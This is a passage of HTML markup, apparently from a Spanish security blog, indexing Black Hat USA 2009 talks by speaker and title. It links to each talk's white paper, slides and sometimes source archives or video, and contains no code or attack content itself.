title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/ENGEL/BHUSA09-Engel-Gizmo-VIDEO"><img
title="White Paper" src="images/BHUSA09-webvideo.png" border="0" alt="BHUSA09 webvideo Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/ENGEL/BHUSA09-Engel-Gizmo-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/ENGEL/BHUSA09-Engel-Gizmo-SOURCE.zip"><img
title="Presentation" src="http://img265.imageshack.us/img265/1557/bhusa09websource.png" border="0" alt="bhusa09websource Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Stefan Esser</h3><h2>State of the Art Post Exploitation in Hardened PHP Environments</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/ESSER/BHUSA09-Esser-PostExploitationPHP-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/ESSER/BHUSA09-Esser-PostExploitationPHP-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Tony Flick</h3><h2>Hacking the Smart Grid</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/FLICK/BHUSA09-Flick-HackingSmartGrid-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/FLICK/BHUSA09-Flick-HackingSmartGrid-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Andrew Fried, Paul Vixie, Dr. Chris Lee</h3><h2><a
href="http://www.dragonjar.org/tag/internet-special-ops" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Internet Special Ops">Internet Special Ops</a>: Stalking Badness Through <a
href="http://www.dragonjar.org/tag/data-mining" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Data Mining">Data Mining</a></h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/FRIED/BHUSA09-Fried-DataMining-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/FRIED/BHUSA09-Fried-DataMining-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Chris Gates</h3><h2>Breaking the &#8220;Unbreakable&#8221; Oracle with Metasploit</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Travis Goodspeed</h3><h2>A 16 bit Rootkit and Second Generation Zigbee Chips</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/GOODSPEED/BHUSA09-Goodspeed-ZigbeeChips-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a><br
/> <a
href="http://www.blackhat.com/presentations/bh-usa-09/GOODSPEED/BHUSA09-Goodspeed-ZigbeeChips-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3><a
href="http://www.dragonjar.org/tag/joe-grand" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Joe Grand">Joe Grand</a>, Jacob Appelbaum, Chris Tarnovsky</h3><h2>&#8220;Smart&#8221; Parking Meter Implementations, Globalism, and You</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/GRAND/BHUSA09-Grand-ParkingMeter-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/GRAND/BHUSA09-Grand-ParkingMeter-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3><a
href="http://www.dragonjar.org/tag/jennifer-granick" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Jennifer Granick">Jennifer Granick</a></h3><h2>Computer Crime Year In Review: MySpace, MBTA, Boston College and More</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/GRANICK/BHUSA09-Granick-YearReview-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a><br
/> <a
href="http://www.blackhat.com/presentations/bh-usa-09/GRANICK/BHUSA09-Granick-YearReview-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Jeremiah Grossman, Trey Ford</h3><h2>Mo&#8217; Money Mo&#8217; Problems: Making A LOT More Money on the Web the Black Hat Way</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/GROSSMAN/BHUSA09-Grossman-MoMoneyMoProblems-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/GROSSMAN/BHUSA09-Grossman-MoMoneyMoProblems-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Peter Guerra</h3><h2>How Economics and Information Security Affects Cyber Crime and What It Means in the Context of a Global Recession</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/GUERRA/BHUSA09-Guerra-EconomicsCyberCrime-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/GUERRA/BHUSA09-Guerra-EconomicsCyberCrime-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3><a
href="http://www.dragonjar.org/tag/nathan-hamiel" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Nathan Hamiel">Nathan Hamiel</a>, Shawn Moyer</h3><h2>Weaponizing the Web: More Attacks on User-Generated Content</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/HAMIEL/BHUSA09-Hamiel-DynamicCSRF-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/HAMIEL/BHUSA09-Hamiel-DynamicCSRF-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Nick Harbour</h3><h2>Win at Reversing: Tracing and Sandboxing through Inline Hooking</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/HARBOUR/BHUSA09-Harbour-WinReversing-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/HARBOUR/BHUSA09-Harbour-WinReversing-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Riley Hassell</h3><h2>Exploiting Rich Content</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/HASSELL/BHUSA09-Hassell-ExploitRichContent-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/HASSELL/BHUSA09-Hassell-ExploitRichContent-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Mikko Hypponen</h3><h2>The Conficker Mystery</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/HYPPONEN/BHUSA09-Hypponen-ConfickerMystery-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/HYPPONEN/BHUSA09-Hypponen-ConfickerMystery-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Vincenzo Iozzo, Charlie Miller</h3><h2>Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/IOZZO/BHUSA09-Iozzo-iPhoneMeterpreter-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/IOZZO/BHUSA09-Iozzo-iPhoneMeterpreter-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Dan Kaminsky</h3><h2>Something about Network Security</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/KAMINSKY/"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="https://media.blackhat.com/bh-usa-09/video/KAMINSKY/BHUSA09-Kaminsky-BlackOpsPKI-VIDEO.mov" target="_blank"><img
title="Video Recording" src="http://img27.imageshack.us/img27/354/bhusa09webvideo.png" border="0" alt="bhusa09webvideo Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/KAMINSKY/"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Peter Kleissner</h3><h2>Stoned Bootkit</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/KLEISSNER/BHUSA09-Kleissner-StonedBootkit-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/KLEISSNER/BHUSA09-Kleissner-StonedBootkit-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Kostya Kortchinsky</h3><h2>Cloudburst: Hacking 3D (and Breaking Out of VMware)</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Zane Lackey, Luis Miras</h3><h2>Attacking SMS</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/LACKEY/BHUSA09-Lackey-AttackingSMS-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/LACKEY/BHUSA09-Lackey-AttackingSMS-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Aaron LeMasters, Michael Murphy</h3><h2>Rapid Enterprise Triaging (RETRI): How to Run a Compromised Network and Keep Your Data Safe</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/LEMASTERS/BHUSA09-LeMasters-RETRI-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/LEMASTERS/BHUSA09-LeMasters-RETRI-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Felix &#8220;FX&#8221; Lindner</h3><h2>Router Exploitation</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/LINDNER/BHUSA09-Lindner-RouterExploit-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/LINDNER/BHUSA09-Lindner-RouterExploit-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Kevin Mahaffey, <a
href="http://www.dragonjar.org/tag/anthony-lineberry" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Anthony Lineberry">Anthony Lineberry</a>, John Hering</h3><h2>Is Your Phone Pwned? Auditing, Attacking and Defending Mobile Devices</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/MAHAFFEY/BHUSA09-Mahaffey-MobileFuzzing-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a><br
/> <a
href="http://www.blackhat.com/presentations/bh-usa-09/MAHAFFEY/BHUSA09-Mahaffey-MobileFuzzing-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Moxie Marlinspike</h3><h2>More Tricks For Defeating SSL</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/MARLINSPIKE/"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="https://media.blackhat.com/bh-usa-09/video/MARLINSPIKE/BHUSA09-Marlinspike-DefeatSSL-VIDEO.mov" target="_blank"><img
title="Video Recording" src="http://img27.imageshack.us/img27/354/bhusa09webvideo.png" border="0" alt="bhusa09webvideo Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/MARLINSPIKE/BHUSA09-Marlinspike-DefeatSSL-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>John McDonald, Chris Valasek</h3><h2>Practical Windows XP/2003 Heap Exploitation</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/MCDONALD/BHUSA09-McDonald-WindowsHeap-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/MCDONALD/BHUSA09-McDonald-WindowsHeap-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Haroon Meer, <a
href="http://www.dragonjar.org/tag/nick-arvanitis" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Nick Arvanitis">Nick Arvanitis</a>, Marco Slaviero</h3><h2>Clobbering the Cloud!</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/MEER/BHUSA09-Meer-ClobberingCloud-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/MEER/BHUSA09-Meer-ClobberingCloud-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Erez Metula</h3><h2>Managed Code Rootkits: Hooking into the Runtime Environments</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/METULA/BHUSA09-Metula-NETFrameworkRootkits-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/Metula/BHUSA09-Metula-NETFrameworkRootkits-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/METULA/BHUSA09-Metula-NETFrameworkRootkits-SOURCE.zip"><img
title="Source" src="http://img265.imageshack.us/img265/1557/bhusa09websource.png" border="0" alt="bhusa09websource Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Charlie Miller, Collin Mulliner</h3><h2>Fuzzing the Phone in your Phone</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/MILLER/BHUSA09-Miller-FuzzingPhone-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/MILLER/BHUSA09-Miller-FuzzingPhone-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>David Mortman</h3><h2>A Black Hat Vulnerability Risk Assessment</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/MORTMAN/BHUSA09-Mortman-VulnRiskAssess-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/MORTMAN/BHUSA09-Mortman-VulnRiskAssess-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Graeme Neilson</h3><h2>Netscreen of the Dead: Developing a Trojaned ScreenOS for Juniper Netscreen Appliances</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/NIELSON/BHUSA09-Neilson-NetscreenDead-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/NIELSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Steve Ocepek</h3><h2>Long-Term Sessions: This Is Why We Can&#8217;t Have Nice Things</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/OCEPEK/BHUSA09-Ocepek-LongTermSessions-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/OCEPEK/BHUSA09-Ocepek-LongTermSessions-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/OCEPEK/BHUSA09-Ocepek-LongTermSessions-SOURCE.zip"><img
title="Source" src="http://img265.imageshack.us/img265/1557/bhusa09websource.png" border="0" alt="bhusa09websource Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Jeongwook Oh</h3><h2>Fight Against 1-day Exploits: Diffing Binaries vs Anti-diffing Binaries</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/OH/BHUSA09-Oh-DiffingBinaries-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/OH/BHUSA09-Oh-DiffingBinaries-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Alfredo Ortega, Anibal Sacco</h3><h2>Deactivate the Rootkit</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/ORTEGA/BHUSA09-Ortega-DeactivateRootkit-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/ORTEGA/BHUSA09-Ortega-DeactivateRootkit-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Thomas H. Ptacek, David Goldsmith, Jeremy Rauch</h3><h2>Hacking Capitalism &#8217;09: Vulnerabilities In Markets And Trading Platforms</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/PTACEK/"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/PTACEK/"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Danny Quist, Lorie Liebrock</h3><h2>Reverse Engineering By Crayon: Game Changing Hypervisor Based Malware Analysis and Visualization</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/QUIST/BHUSA09-Quist-RevEngCrayon-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/QUIST/BHUSA09-Quist-RevEngCrayon-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Tiffany Strauchs Rad, <a
href="http://www.dragonjar.org/tag/james-arlen" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con James Arlen">James Arlen</a></h3><h2>Your Mind: Legal Status, Rights and Securing Yourself</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/RAD/BHUSA09-Rad-YourMind-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/RAD/BHUSA09-Rad-YourMind-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Daniel Raygoza</h3><h2>Automated Malware Similarity Analysis</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/RAYGOZA/BHUSA09-Raygoza-MalwareSimAnalysis-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/RAYGOZA/BHUSA09-Raygoza-MalwareSimAnalysis-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Peter Silberman, Steve Davis</h3><h2>Metasploit Autopsy: Reconstructing the Crime Scene</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/SILBERMAN/BHUSA09-Silberman-MetasploitAutopsy-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/SILBERMAN/BHUSA09-Silberman-MetasploitAutopsy-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/SILBERMAN/BHUSA09-Silberman-MetasploitAutopsy-SOURCE.zip"><img
title="Source" src="http://img265.imageshack.us/img265/1557/bhusa09websource.png" border="0" alt="bhusa09websource Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Val Smith, Colin Ames, David Kerb</h3><h2>MetaPhish</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/SMITH_VAL/BHUSA09-Smith-MetaPhish-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/SMITH_VAL/BHUSA09-Smith-MetaPhish-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Mike Zusman, Alexander Sotirov</h3><h2>Breaking the security myths of Extended Validation SSL Certificates</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/ZUSMAN/BHUSA09-Zusman-AttackExtSSL-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/ZUSMAN/BHUSA09-Zusman-AttackExtSSL-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Kevin Stadmeyer, Garrett Held</h3><h2>Worst of the Best of the Best</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/STADMEYER/BHUSA09-Stadmeyer-Worst-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/STADMEYER/BHUSA09-Stadmeyer-Worst-SLIDES.pdf"><img
